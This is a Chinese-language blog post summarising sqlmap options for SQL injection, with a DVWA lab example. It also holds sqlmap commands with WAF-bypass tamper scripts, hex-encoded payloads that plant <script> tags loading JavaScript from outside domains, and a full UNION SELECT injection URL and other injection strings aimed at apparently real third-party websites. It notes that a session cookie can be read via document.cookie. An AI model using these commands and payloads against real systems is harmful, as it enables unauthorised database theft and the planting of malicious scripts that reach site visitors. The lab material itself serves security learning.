SQL常用参数总结

  • A+
所属分类:sql注入

一、环境:wamp+dvwa1.07(本地测试环境)

注入点:http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#  参数id上面存在注入
 sudo sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#"; --cookie="security=low; PHPSESSID=qge9s29bf5d0540vlr4qf0vtu0" -p id --string="First name" -b

二、利用SQLMAP绕过防注入:

sqlmap.py -u http://172.16.15.55:808/evnews/news.php?id=10 -v 3 --dbms "mysql" --technique U -p id --batch  --tamper "space2morehash.py" --dbs
1、SQLinject with javascript:
<script src='http://www.mlhotels.com/upload/sql.js'></script>;
0x3C736372697074207372633D27687474703A2F2F7777772E6D6C686F74656C732E636F6D2F75706C6F61642F73716C2E6A73273E3C2F7363726970743E
<script src='http://www.mlhotels.com/upload/sql.js'></script>;
0x3C736372697074207372633D27687474703A2F2F7777772E6D6C686F74656C732E636F6D2F75706C6F61642F73716C2E6A73273E3C2F7363726970743E
<script src='http://www.zzbfsoft.com/js/sql.js'></script>;
0x3C736372697074207372633D27687474703A2F2F7777772E7A7A6266736F66742E636F6D2F6A732F73716C2E6A73273E3C2F7363726970743E
 http://www.science-art.com.cn/article.php?id=-2910 UNION SELECT 1,2,3,4,5,6,concat((0x3C736372697074207372633D27687474703A2F2F7777772E7A7A6266736F66742E636F6D2F6A732F73716C2E6A73273E3C2F7363726970743E)),8,9
0x<script src='http://www.zzbfsoft.com/js/sql.js'></script>
concat((<script src='http://www.zzbfsoft.com/js/sql.js'></script>))
2、--level 2 使用级别3测试-----使sqlmap支持cookie注入

[qgg_yellow]更改sqlmap的测试级别,当 --level >=2 的时候,sqlmap将检测 cookie里面的参数。。。[/qgg_yellow]

(1)-u 或者 --url 指定目标地址,例如
-u "http://www.waitalone.cn/sqlinject.php?id=1 或者--url="http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#";
(2)--cookie 指定目标所需要的cookie值

如果目标地址需要登陆以后才可以注入的,你可以登陆以后使用javascript:alert(document.cookie);来得到当前会话的cookie信息

例如 --cookie="security=low; PHPSESSID=qge9s29bf5d0540vlr4qf0vtu0"

 

(3)-p 指定注入点参数

当URL中有多个参数的时候,比如id=1&type=test的时候,你可以手动指定注入参数。例如 -p id

* 指定SQL注入语句位置,可以进行伪静态注入。例如:

sqlmap.py -u "http://target.tld/id1/1*/id2/2";   http://www.gzcity.com/jiaoyou.php?pid=1'; or @`'` * or @`'` and '1'='1
(4)--string 指定页面关键字

当使用sqlmap对注入点进行测试时,如果确定是注入但是sqlmap识别不出来的时候请手动指定页面关键字:

例如 --string="First name"

 

(5)-b 显示banner信息

针对此例 显示的是数据库的版本号

banner:    '5.5.8-log'

 

(6)--dbs 显示数据库

显示结果:

[16:21:42] [INFO] fetching database names
available databases [6]:
[*] dedecms
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

 

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: